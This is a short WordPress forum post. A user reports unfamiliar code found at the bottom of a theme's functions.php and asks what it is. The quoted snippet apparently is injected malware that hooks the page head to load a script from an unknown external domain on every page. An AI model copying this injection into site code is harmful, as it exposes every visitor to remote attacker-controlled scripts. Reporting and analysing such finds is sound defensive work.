Strange Code on Functions.php
-
I recently checked the functions.php of Hello Elementor theme and found out at the very bottom contain this code.
/**<js>*/function add_my_code() {
echo '<script async src="https://billing.roofnrack.us/dh+V4w099ooSPa/RQSi5wQQ9r8EbPeg="></script>';
}
add_action('wp_head', 'add_my_code');/**<js>*/I checked the theme repository and they don’t have this kind of code. I don’t even know the URL put there. Can someone explain?
Viewing 3 replies - 1 through 3 (of 3 total)
Viewing 3 replies - 1 through 3 (of 3 total)
The topic ‘Strange Code on Functions.php’ is closed to new replies.
